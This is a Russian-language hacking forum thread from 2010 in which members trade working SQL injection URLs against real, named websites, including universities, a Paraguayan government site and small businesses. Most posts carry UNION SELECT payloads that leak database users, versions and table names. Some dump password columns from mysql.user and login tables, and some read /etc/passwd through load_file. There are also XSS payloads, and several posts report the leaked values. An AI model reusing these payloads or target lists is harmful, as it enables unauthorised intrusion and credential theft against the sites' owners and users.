21.03.2010, 16:37
|
|
Участник форума
Регистрация: 09.01.2009
Сообщений: 155
С нами:
9123693
Репутация:
94
|
|
http://surediamond.com/product.php?disproid=53+union+select+1,2,version() ,4,5--
можно ли както раскрутить дальше ? подскажите в пм , спс.
Последний раз редактировалось SEWERN; 21.03.2010 в 16:43..
|
|
|
21.03.2010, 20:12
|
|
Познавший АНТИЧАТ
Регистрация: 04.08.2008
Сообщений: 1,359
С нами:
9351139
Репутация:
1593
|
|
Код:
http://www.che-esche.com/fullafisha.php?id=-1+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15
Код:
http://thedivinemercy.org/news/department.php?PLID=-72+union+select+1,user(),version(),4,5/*
Код:
http://www.ktcomputer.de/start.php?kat=news&kat_id=-1+union+select+1,2,3,4,5,6,7,8,version(),user(),11,12,13,14,15,16,17--
Первые SQL-ы, практикуюсь  |
|
|
|
21.03.2010, 23:38
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
http://www.revues-plurielles.org/php/index.php?nav=revue&no=17+union+select+1,2,3,4,5
OS -Windows NT
user() revues-plu-admin@localhost
version() 5.0.21-community-nt
database() revues-plurielles
+ XSS
http://www.revues-plurielles.org/php/index.php?nav=revue&no="><script>alert('ANTICHAT') </script>
|
|
|
|
22.03.2010, 00:49
|
|
Познавший АНТИЧАТ
Регистрация: 04.08.2008
Сообщений: 1,359
С нами:
9351139
Репутация:
1593
|
|
Код:
http://www.zeltarasa.com/?lang=ru&id=1+union+select+1,concat_ws(0x3a,user(),database(),version())+--
Код:
http://www.fotomundo.com/nota.php?id=-1+union+select+1,2,3,4,version(),user(),7,database(),9,10,11,12,13,14,15--
Код:
http://krasuis.ru/inset/foto.php?id=1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4--
Код:
http://www.provisor.com.ua/news.php?art=-1+union+select+1,2,3,4,5,6,7,user(),version(),database()--
Код:
http://www.boxclever.ca/news.php?id=-1+union+select+version(),2,user(),database(),5+--+
Код:
http://www.ekomtech.kiev.ua/a-news/news.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9--
Код:
http://shepherdpost.christianpost.com/mainbox/news.php?cat=-1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9+--+
Здесь можно посмотреть таблицы:
Код:
http://shepherdpost.christianpost.com/mainbox/news.php?cat=-1+union+select+1,2,3,table_name,5,6,7,8,9+from+information_schema.tables+--
Код:
http://dev.ultimareplenisher.com/news.php?id=-1+union+select+concat_ws(0x3a,user(),database(),version()),2--
Код:
http://www.kpbptpn.co.id/news.php?lang=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13--
Код:
http://views24hours.com/view24hours/news.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9--
Здесь вывод в самом низу, справа.
Код:
http://www.tagittins.co.uk/news.php?id=-1+union+select+1,user(),3,database(),5,6,7,8,9--
Код:
http://avto-tire.ru/item_view.php?id=&item_id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11,12,13,14,15,16,17+--+
Здесь 54 таблицы, последняя:
Код:
http://avto-tire.ru/item_view.php?id=&item_id=-1+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17+from+information_schema.tables+limit+54,1--+
Код:
http://www.ctaholidays.net/beta/holiday_details.php?id=-1+union+select+1,2,3,4,5,6,7,user(),9,10,11,12,13,14,database()--
Последний раз редактировалось root_sashok; 22.03.2010 в 19:46..
|
|
|
|
22.03.2010, 15:41
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
С нами:
10339586
Репутация:
1396
|
|
http://www.ksds.edu/community/holidays.php?hid=40+order+by+6/*
User: scully@localhost
Version: 4.1.22-log
Dbname: scully
есть таблица мемберс
|
|
|
|
22.03.2010, 17:23
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
http://www.diffusion.ens.fr/index.php?res=themes&idtheme=30+and+1=0+union+sele ct+1,2,3,concat(user,char(58),password),5,6+from+m ysql.user--
OS - Debian GNU/Linux
user() : root@localhost
version() : 4.0.24_Debian-10sarge1-log
database() : ens_data
robots.txt:
User-agent: *
Disallow: /chbpascal/
Disallow: /college/video_college
Disallow: /college/photos
Disallow: /college/vignettes
Disallow: /college/en/video_college
Disallow: /college/en/photos
Disallow: /college/en/vignettes
Disallow: /en/audio
Disallow: /en/bonus
Disallow: /en/photos
Disallow: /en/video
Disallow: /en/video_stream
Disallow: /en/vignettes
Disallow: /pear
Disallow: /photos
Disallow: /administration
Disallow: /vignettes
Disallow: /college2
Disallow: /video
Disallow: /audio
Disallow: /video_stream
Disallow: /bonus
/etc/passwd
http://www.diffusion.ens.fr/index.php?res=themes&idtheme=30+and+1=0+union+sele ct+1,2,3,load_file(CHAR(47,101,116,99,47,112,97,11 5,115,119,100)),5,6+from+mysql.user--
+XSS
http://www.diffusion.ens.fr/index.php?res=themes&idtheme=30+and+1=0+union+sele ct+1,2,3,<img src=http://img525.imageshack.us/img525/7127/matrixic9.jpg></img>,5,6-- |
|
|
|
22.03.2010, 19:20
|
|
Познавший АНТИЧАТ
Регистрация: 04.08.2008
Сообщений: 1,359
С нами:
9351139
Репутация:
1593
|
|
Здесь вывод в заголовке:
Код:
http://map64.ru/index.php?id=-1+union+select+user()--
Есть таблица users, она последняя:
Код:
http://map64.ru/index.php?id=-1+union+select+table_name+from+information_schema.tables+limit+23,1--
Админка:
Код:
http://www.map64.ru/job
Последний раз редактировалось root_sashok; 22.03.2010 в 19:57..
|
|
|
|
22.03.2010, 19:31
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
С нами:
10339586
Репутация:
1396
|
|
dudu,edu
http://dotank.nyls.edu/projects/DDT/sys_index.pl?pid=0&iid=7&alt_id=45'+union+select+1 ,2,3,email,password,6+from+users/*&action=view_alternate
version:4
----------------------------------
http://muscle.hps.gatech.edu/protocol.pl?pid=14+union+select+version()+from+use r+limit+1,1--+&op=Show
вывод в тайтле
Последний раз редактировалось $n@ke; 22.03.2010 в 19:43..
|
|
|
|
22.03.2010, 20:18
|
|
Познающий
Регистрация: 07.02.2009
Сообщений: 89
С нами:
9082406
Репутация:
106
|
|
http://www.dynamicinst.net/news.php?id=21+union+select+1,2,3,4,concat(user,0x 3a,password)+from+login/*
и оно же
http://www.dynamicinst.net/news.php?id=21+union+select+1,2,3,4,concat_ws(0x3a ,user(),database(),version())/*
User: dynamicdb@localhost
Version: 5.0.27
Dbname: dynamic
Последний раз редактировалось kori256; 22.03.2010 в 21:21..
|
|
|
|
22.03.2010, 21:42
|
|
Познавший АНТИЧАТ
Регистрация: 04.08.2008
Сообщений: 1,359
С нами:
9351139
Репутация:
1593
|
|
Код:
http://www.conacyt.gov.py/admin/mostrar.php?noti=imagen&id=-1+union+select+1,concat_ws(0x3a,user(),database(),version())--
Username: web@localhost
Database: web
Version: 5.0.26
Код:
http://www.wyoptv.org/programming/viewprogram.php?id=1+union+select+1,user(),3,4,5,6,7,8,9,10,11,version(),database()/*
Username: wyoptv@localhost
Database: wyoptv
Version: 5.0.32-Debian_7etch6-log
Код:
http://www.2how.com/board/index.php?group=-1+union+select+1,2,3,4,version%28%29,6,7,8,9,10,11,12,13--
Username: root@localhost
Database: howhow_board
Version: 5.0.67-log
Код:
http://www.china-efe.org/article/article_show.php?article_id=-1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16--
Username: chinaedu@localhost
Database: chinaefe
Version: 5.1.11-beta-log
Последний раз редактировалось root_sashok; 22.03.2010 в 22:52..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
